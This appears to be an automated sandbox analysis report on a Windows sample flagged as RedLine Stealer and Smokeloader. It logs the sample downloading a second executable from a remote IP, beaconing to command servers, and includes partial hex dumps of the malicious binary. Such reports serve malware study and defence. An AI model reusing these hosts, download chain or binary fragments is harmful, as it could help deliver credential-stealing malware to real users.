                                                                    Dec 18, 2024 20:55:41.802007914 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.802099943 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.802149057 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.803457022 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.803509951 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.803612947 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.803658962 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.805202961 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.805262089 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.805758953 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.805851936 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.806759119 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.806817055 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.807162046 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.807212114 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.808852911 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.808866978 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.808916092 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.809952021 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.809967041 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.810012102 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.811885118 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.811899900 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.811947107 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.813122988 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.813137054 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.813179970 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.816015959 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.816030025 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.816082001 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.817516088 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.817569971 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.818200111 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.818252087 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.819653034 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.819667101 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.819708109 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.821089029 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.821108103 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.821140051 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.821162939 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.822571993 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.822640896 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.823285103 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.823332071 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.824749947 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.824765921 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.824810982 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.825529099 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.825581074 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.826253891 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.826302052 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:41.827675104 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:41.827727079 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:45.111607075 CET49712443192.168.2.12172.67.220.223
                                                                    Dec 18, 2024 20:55:45.111649036 CET44349712172.67.220.223192.168.2.12
                                                                    Dec 18, 2024 20:55:45.111720085 CET49712443192.168.2.12172.67.220.223
                                                                    Dec 18, 2024 20:55:45.113050938 CET49712443192.168.2.12172.67.220.223
                                                                    Dec 18, 2024 20:55:45.113066912 CET44349712172.67.220.223192.168.2.12
                                                                    Dec 18, 2024 20:55:46.102762938 CET8049711176.113.115.19192.168.2.12
                                                                    Dec 18, 2024 20:55:46.102899075 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:55:46.337301970 CET44349712172.67.220.223192.168.2.12
                                                                    Dec 18, 2024 20:55:46.337579012 CET49712443192.168.2.12172.67.220.223
                                                                    Dec 18, 2024 20:55:46.402962923 CET49712443192.168.2.12172.67.220.223
                                                                    Dec 18, 2024 20:55:46.402988911 CET44349712172.67.220.223192.168.2.12
                                                                    Dec 18, 2024 20:55:46.403445959 CET44349712172.67.220.223192.168.2.12
                                                                    Dec 18, 2024 20:55:46.454050064 CET49712443192.168.2.12172.67.220.223
                                                                    Dec 18, 2024 20:55:46.795124054 CET49712443192.168.2.12172.67.220.223
                                                                    Dec 18, 2024 20:55:46.795284033 CET49712443192.168.2.12172.67.220.223
                                                                    Dec 18, 2024 20:55:46.795331001 CET44349712172.67.220.223192.168.2.12
                                                                    Dec 18, 2024 20:55:47.533736944 CET44349712172.67.220.223192.168.2.12
                                                                    Dec 18, 2024 20:55:47.533807039 CET44349712172.67.220.223192.168.2.12
                                                                    Dec 18, 2024 20:55:47.533885002 CET49712443192.168.2.12172.67.220.223
                                                                    Dec 18, 2024 20:55:47.546171904 CET49712443192.168.2.12172.67.220.223
                                                                    Dec 18, 2024 20:55:47.546185017 CET44349712172.67.220.223192.168.2.12
                                                                    Dec 18, 2024 20:55:47.557703018 CET49715443192.168.2.12172.67.220.223
                                                                    Dec 18, 2024 20:55:47.557735920 CET44349715172.67.220.223192.168.2.12
                                                                    Dec 18, 2024 20:55:47.557811022 CET49715443192.168.2.12172.67.220.223
                                                                    Dec 18, 2024 20:55:47.558098078 CET49715443192.168.2.12172.67.220.223
                                                                    Dec 18, 2024 20:55:47.558109999 CET44349715172.67.220.223192.168.2.12
                                                                    Dec 18, 2024 20:55:48.594984055 CET49715443192.168.2.12172.67.220.223
                                                                    Dec 18, 2024 20:57:26.641752958 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:57:26.953921080 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:57:27.567970037 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:57:28.782058954 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:57:31.219505072 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:57:36.099258900 CET4971180192.168.2.12176.113.115.19
                                                                    Dec 18, 2024 20:57:45.828860044 CET4971180192.168.2.12176.113.115.19
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 18, 2024 20:55:36.654336929 CET5300853192.168.2.121.1.1.1
                                                                    Dec 18, 2024 20:55:36.919024944 CET53530081.1.1.1192.168.2.12
                                                                    Dec 18, 2024 20:55:44.631941080 CET5121653192.168.2.121.1.1.1
                                                                    Dec 18, 2024 20:55:45.104413986 CET53512161.1.1.1192.168.2.12
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Dec 18, 2024 20:55:36.654336929 CET192.168.2.121.1.1.10x8d42Standard query (0)post-to-me.comA (IP address)IN (0x0001)false
                                                                    Dec 18, 2024 20:55:44.631941080 CET192.168.2.121.1.1.10x7bbaStandard query (0)rapeflowwj.latA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Dec 18, 2024 20:55:36.919024944 CET1.1.1.1192.168.2.120x8d42No error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false
                                                                    Dec 18, 2024 20:55:36.919024944 CET1.1.1.1192.168.2.120x8d42No error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                                    Dec 18, 2024 20:55:45.104413986 CET1.1.1.1192.168.2.120x7bbaNo error (0)rapeflowwj.lat172.67.220.223A (IP address)IN (0x0001)false
                                                                    Dec 18, 2024 20:55:45.104413986 CET1.1.1.1192.168.2.120x7bbaNo error (0)rapeflowwj.lat104.21.24.223A (IP address)IN (0x0001)false
                                                                    • post-to-me.com
                                                                    • rapeflowwj.lat
                                                                    • 176.113.115.19
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.1249711176.113.115.19807096C:\Users\user\Desktop\sqJIHyPqhr.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 18, 2024 20:55:39.423887014 CET85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                                    User-Agent: ShareScreen
                                                                    Host: 176.113.115.19
                                                                    Dec 18, 2024 20:55:40.836658955 CET1236INHTTP/1.1 200 OK
                                                                    Date: Wed, 18 Dec 2024 19:55:40 GMT
                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                    Last-Modified: Wed, 18 Dec 2024 19:45:02 GMT
                                                                    ETag: "59e00-62990a64a108c"
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 368128
                                                                    Content-Type: application/x-msdos-program
                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 77 42 b3 41 33 23 dd 12 33 23 dd 12 33 23 dd 12 8e 6c 4b 12 32 23 dd 12 2d 71 59 12 2d 23 dd 12 2d 71 48 12 27 23 dd 12 2d 71 5e 12 5d 23 dd 12 14 e5 a6 12 36 23 dd 12 33 23 dc 12 40 23 dd 12 2d 71 57 12 32 23 dd 12 2d 71 49 12 32 23 dd 12 2d 71 4c 12 32 23 dd 12 52 69 63 68 33 23 dd 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 58 67 5f 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f4 03 00 00 2a 3f 00 00 00 00 00 04 1a 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 43 00 00 04 00 00 fd 10 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$wBA3#3#3#lK2#-qY-#-qH'#-q^]#6#3#@#-qW2#-qI2#-qL2#Rich3#PELXg_e*?@0C(<B.text `.rdata!"@@.data=@p@.rsrcB@@
                                                                    Dec 18, 2024 20:55:40.836782932 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 64 10 44 00 3b 0d 04 40 44 00 75 02 f3 c3 e9 f9 09 00 00 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08
                                                                    Data Ascii: %dD;@DuUQeVEPuupu9EttM^jh$Deu;5w"jYeVYEEEjYUVuSW=D=oDuc
                                                                    Dec 18, 2024 20:55:40.836796999 CET1236INData Raw: 7e 8a 0b 88 4f 01 83 b8 ac 00 00 00 01 7e 32 33 c9 85 f6 0f 95 c1 51 56 6a 02 57 6a 09 ff 70 04 ff 15 a0 10 44 00 85 c0 74 17 83 27 00 8b 45 08 85 c0 74 b2 8b 4d f0 8b 89 ac 00 00 00 89 08 eb a5 83 27 00 e8 61 06 00 00 c7 00 2a 00 00 00 85 f6 74
                                                                    Data Ascii: ~O~23QVjWjpDt'EtM'a*t3fEtC}MapEPPQ3YYtZM9EsE7,~3RVPSjqDP{FU3
                                                                    Dec 18, 2024 20:55:40.837544918 CET1236INData Raw: c4 74 06 0f b7 4d c8 eb 03 6a 0a 59 51 50 56 68 00 00 40 00 e8 f7 b7 03 00 89 45 e0 39 75 e4 75 06 50 e8 45 14 00 00 e8 6c 14 00 00 89 7d fc eb 35 8b 45 ec 8b 08 8b 09 89 4d dc 50 51 e8 b2 35 00 00 59 59 c3 8b 65 e8 8b 45 dc 89 45 e0 83 7d e4 00
                                                                    Data Ascii: tMjYQPVh@E9uuPEl}5EMPQ5YYeEE}uP(HEE3@eEr;xU(lDlDlDlD5lD=lDf0lDf$lDflDfkDf%kDf-kD(lDEl
                                                                    Dec 18, 2024 20:55:40.837553978 CET1236INData Raw: 59 85 c0 75 08 6a 11 e8 1c 0d 00 00 59 ff 36 ff 15 c8 10 44 00 5e 5d c3 8b ff 55 8b ec 8b 0d 80 b4 81 00 a1 84 b4 81 00 6b c9 14 03 c8 eb 11 8b 55 08 2b 50 0c 81 fa 00 00 10 00 72 09 83 c0 14 3b c1 72 eb 33 c0 5d c3 8b ff 55 8b ec 83 ec 10 8b 4d
                                                                    Data Ascii: YujY6D^]UkU+Pr;r3]UMAVuW+yiDMIMS1UVUU]utJ?vj?ZK;KuB sL!\Du#M!JL!uM!Y
                                                                    Dec 18, 2024 20:55:40.838329077 CET1236INData Raw: 08 8d 4a 0c 89 48 08 89 41 04 83 64 9e 44 00 33 ff 47 89 bc 9e c4 00 00 00 8a 46 43 8a c8 fe c1 84 c0 8b 45 08 88 4e 43 75 03 09 78 04 ba 00 00 00 80 8b cb d3 ea f7 d2 21 50 08 8b c3 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 0c 8b 4d 08 8b 41 10 53 56
                                                                    Data Ascii: JHAdD3GFCENCux!P_^[UMASVuW}+QiDMOI;|9M]UE;;MIM?vj?YM_;_uC sML!\Du&M!ML
                                                                    Dec 18, 2024 20:55:40.838336945 CET776INData Raw: 89 5d ec 23 5c 88 44 89 5c 88 44 fe 0f 75 33 8b 4d ec 8b 5d 08 21 0b eb 2c 8d 4f e0 d3 eb 8b 4d fc 8d 8c 88 c4 00 00 00 8d 7c 38 04 f7 d3 21 19 fe 0f 89 5d ec 75 0b 8b 5d 08 8b 4d ec 21 4b 04 eb 03 8b 5d 08 83 7d f8 00 8b 4a 08 8b 7a 04 89 79 04
                                                                    Data Ascii: ]#\D\Du3M]!,OM|8!]u]M!K]}JzyJzyMyJzQJQJ;Ju^LM L}#}u;M|D)}uN{MN7MtLMu
                                                                    Dec 18, 2024 20:55:40.839132071 CET1236INData Raw: 0f 84 52 ff ff ff 68 04 40 44 00 57 8b cb e8 0d 31 00 00 e9 1c ff ff ff 8b ff 55 8b ec 33 c0 39 45 08 6a 00 0f 94 c0 68 00 10 00 00 50 ff 15 d8 10 44 00 a3 8c 6f 44 00 85 c0 75 02 5d c3 33 c0 40 a3 78 b4 81 00 5d c3 8b ff 55 8b ec 57 bf e8 03 00
                                                                    Data Ascii: Rh@DW1U39EjhPDoDu]3@x]UWWDu(D`wt_]Uu5BDDh]UhD(DthDPLDtu]UuYuDjJYjg
                                                                    Dec 18, 2024 20:55:40.839138985 CET792INData Raw: 56 56 56 e8 34 06 00 00 83 c4 14 68 10 20 01 00 68 68 17 44 00 57 e8 35 30 00 00 83 c4 0c eb 32 6a f4 ff 15 e8 10 44 00 8b d8 3b de 74 24 83 fb ff 74 1f 6a 00 8d 45 f8 50 8d 34 fd ac 42 44 00 ff 36 e8 a1 32 00 00 59 50 ff 36 53 ff 15 e4 10 44 00
                                                                    Data Ascii: VVV4h hhDW502jD;t$tjEP4BD62YP6SD_^[j}3Ytjp3Yu=@Duh)hYYUErD]U5rDVYtuYt3@]3]`CD`Vj^u;}`jPx
                                                                    Dec 18, 2024 20:55:40.839144945 CET1236INData Raw: df 02 00 00 59 83 f8 ff 74 2e 56 e8 d3 02 00 00 59 83 f8 fe 74 22 56 e8 c7 02 00 00 c1 f8 05 56 8d 3c 85 40 a3 81 00 e8 b7 02 00 00 83 e0 1f 59 c1 e0 06 03 07 59 eb 05 b8 e0 45 44 00 8a 40 04 24 82 3c 82 75 07 81 4e 0c 00 20 00 00 81 7e 18 00 02
                                                                    Data Ascii: Yt.VYt"VV<@YYED@$<uN ~uFtuFNAF~_^]jTh%D3}EPDDEj@j ^VYY;@5(0@@x@$@%@&
                                                                    Dec 18, 2024 20:55:40.956451893 CET1236INData Raw: 74 08 ff 75 08 ff d0 89 45 08 8b 45 08 5e 5d c3 6a 00 e8 87 ff ff ff 59 c3 8b ff 55 8b ec 56 ff 35 24 46 44 00 8b 35 f4 10 44 00 ff d6 85 c0 74 21 a1 20 46 44 00 83 f8 ff 74 17 50 ff 35 24 46 44 00 ff d6 ff d0 85 c0 74 08 8b 80 fc 01 00 00 eb 27
                                                                    Data Ascii: tuEE^]jYUV5$FD5Dt! FDtP5$FDt'DV(DuV YthDPLDtuEE^]DV5$FDDu5rDeYV5$FDD^ FDtP5rD;Y FD$FDtP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.1249710172.67.179.2074437096C:\Users\user\Desktop\sqJIHyPqhr.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-18 19:55:38 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                                    User-Agent: ShareScreen
                                                                    Host: post-to-me.com
                                                                    2024-12-18 19:55:39 UTC805INHTTP/1.1 200 OK
                                                                    Date: Wed, 18 Dec 2024 19:55:39 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    cf-cache-status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rgndvjtUN1lU7AbdzdTb0utzy7F5WjrOCcwbsLd0LrZ0BCzebtzvLqdWcBGZdTzPulY5b2V7YV9%2FEL9PHgBlhDM3HKUNaL%2FEDsmNtc%2FBl19ocqJLNclm7JgZJW%2BC%2F1biFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8f41b62f883c0fa4-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1708&rtt_var=645&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=728&delivery_rate=1688837&cwnd=176&unsent_bytes=0&cid=60b759d229a32525&ts=1038&x=0"
                                                                    2024-12-18 19:55:39 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    2024-12-18 19:55:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.1249712172.67.220.2234436636C:\Users\user\AppData\Local\Temp\E093.tmp.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-18 19:55:46 UTC261OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 8
                                                                    Host: rapeflowwj.lat
                                                                    2024-12-18 19:55:46 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                    Data Ascii: act=life
                                                                    2024-12-18 19:55:47 UTC1039INHTTP/1.1 200 OK
                                                                    Date: Wed, 18 Dec 2024 19:55:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: PHPSESSID=dts0ffuc0gtb8dvvim4i71asva; expires=Sun, 13-Apr-2025 13:42:26 GMT; Max-Age=9999999; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    cf-cache-status: DYNAMIC
                                                                    vary: accept-encoding
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ehaT64y4ymnghjRYnhw8JZ8DOQ%2FqdCHsoiPLm4nV0ixwG3eySM8cY8Le8kxWcb0fA5C3Bwnly%2BM%2BdOimo%2B6npgUVzxzSWmOQglQlrcamSh6CoMczEnJXnJ8v4XdW6ycmSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8f41b6627c5f41f9-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1776&min_rtt=1759&rtt_var=672&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=905&delivery_rate=1660034&cwnd=212&unsent_bytes=0&cid=bb83551e28777d5a&ts=1213&x=0"
                                                                    2024-12-18 19:55:47 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    2024-12-18 19:55:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:14:55:33
                                                                    Start date:18/12/2024
                                                                    Path:C:\Users\user\Desktop\sqJIHyPqhr.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\sqJIHyPqhr.exe"
                                                                    Imagebase:0x400000
                                                                    File size:437'248 bytes
                                                                    MD5 hash:FC0FF134AA4C7A6C02F3D502EB17A1D4
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4891593646.00000000009D9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    Target ID:4
                                                                    Start time:14:55:41
                                                                    Start date:18/12/2024
                                                                    Path:C:\Users\user\AppData\Local\Temp\E093.tmp.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\E093.tmp.exe"
                                                                    Imagebase:0x400000
                                                                    File size:368'128 bytes
                                                                    MD5 hash:9026F04B1266851659FB62C91BD7F2F3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2679002116.0000000000999000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2678891862.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 68%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    Target ID:8
                                                                    Start time:14:55:49
                                                                    Start date:18/12/2024
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 1656
                                                                    Imagebase:0xa70000
                                                                    File size:483'680 bytes
                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:2.2%
                                                                      Dynamic/Decrypted Code Coverage:3.7%
                                                                      Signature Coverage:5.7%
                                                                      Total number of Nodes:759
                                                                      Total number of Limit Nodes:21
                                                                      execution_graph 64878 402c04 InternetOpenW 64879 402e55 64878->64879 64882 402c37 Concurrency::details::GlobalNode::Initialize 64878->64882 64899 40f8cf 64879->64899 64881 402e64 64890 42defd 64882->64890 64885 42defd std::_Locinfo::_Locinfo_ctor 26 API calls 64886 402e17 64885->64886 64887 42defd std::_Locinfo::_Locinfo_ctor 26 API calls 64886->64887 64888 402e29 InternetOpenUrlW 64887->64888 64888->64879 64889 402e44 InternetCloseHandle InternetCloseHandle 64888->64889 64889->64879 64891 42df0c 64890->64891 64893 42df1a 64890->64893 64891->64893 64897 42df4a 64891->64897 64906 42eac9 20 API calls __Wcrtomb 64893->64906 64894 42df24 64907 42a59d 26 API calls _Deallocate 64894->64907 64896 402e09 64896->64885 64897->64896 64908 42eac9 20 API calls __Wcrtomb 64897->64908 64900 40f8d8 64899->64900 64901 40f8da IsProcessorFeaturePresent 64899->64901 64900->64881 64903 40f94d 64901->64903 64909 40f911 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64903->64909 64905 40fa30 64905->64881 64906->64894 64907->64896 64908->64894 64909->64905 64910 40fc06 64911 40fc12 ___DestructExceptionObject 64910->64911 64939 40fff3 64911->64939 64913 40fc19 64914 40fd6c 64913->64914 64917 40fc43 64913->64917 64960 4104d3 4 API calls 2 library calls 64914->64960 64916 40fd73 64961 42ffc9 28 API calls _Atexit 64916->64961 64928 40fc82 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 64917->64928 64954 42fcee 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 64917->64954 64919 40fd79 64962 42ff7b 28 API calls _Atexit 64919->64962 64922 40fd81 64923 40fc62 64924 40fc5c 64924->64923 64955 42fc92 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 64924->64955 64926 40fce3 64950 4105ed 64926->64950 64928->64926 64956 42a366 167 API calls 4 library calls 64928->64956 64930 40fce9 64931 40fcfe 64930->64931 64957 410623 GetModuleHandleW 64931->64957 64933 40fd05 64933->64916 64934 40fd09 64933->64934 64935 40fd12 64934->64935 64958 42ff6c 28 API calls _Atexit 64934->64958 64959 410182 13 API calls 2 library calls 64935->64959 64938 40fd1a 64938->64923 64940 40fffc 64939->64940 64963 41077b IsProcessorFeaturePresent 64940->64963 64942 410008 64964 428827 10 API calls 3 library calls 64942->64964 64944 41000d 64945 410011 64944->64945 64965 4317a1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64944->64965 64945->64913 64947 41001a 64948 410028 64947->64948 64966 428850 8 API calls 3 library calls 64947->64966 64948->64913 64967 426830 64950->64967 64953 410613 64953->64930 64954->64924 64955->64928 64956->64926 64957->64933 64958->64935 64959->64938 64960->64916 64961->64919 64962->64922 64963->64942 64964->64944 64965->64947 64966->64945 64968 410600 GetStartupInfoW 64967->64968 64968->64953 64969 24a003c 64970 24a0049 64969->64970 64984 24a0e0f SetErrorMode SetErrorMode 64970->64984 64975 24a0265 64976 24a02ce VirtualProtect 64975->64976 64978 24a030b 64976->64978 64977 24a0439 VirtualFree 64981 24a04be 64977->64981 64982 24a05f4 LoadLibraryA 64977->64982 64978->64977 64979 24a04e3 LoadLibraryA 64979->64981 64981->64979 64981->64982 64983 24a08c7 64982->64983 64985 24a0223 64984->64985 64986 24a0d90 64985->64986 64987 24a0dad 64986->64987 64988 24a0dbb GetPEB 64987->64988 64989 24a0238 VirtualAlloc 64987->64989 64988->64989 64989->64975 64990 432785 64995 432553 64990->64995 64994 4327ad 65000 43257e 64995->65000 64997 432771 65014 42a59d 26 API calls _Deallocate 64997->65014 64999 4326d0 64999->64994 65007 43d01c 64999->65007 65000->65000 65003 4326c7 65000->65003 65010 43c8ce 170 API calls 2 library calls 65000->65010 65002 432711 65002->65003 65011 43c8ce 170 API calls 2 library calls 65002->65011 65003->64999 65013 42eac9 20 API calls __Wcrtomb 65003->65013 65005 432730 65005->65003 65012 43c8ce 170 API calls 2 library calls 65005->65012 65015 43c9f1 65007->65015 65009 43d037 65009->64994 65010->65002 65011->65005 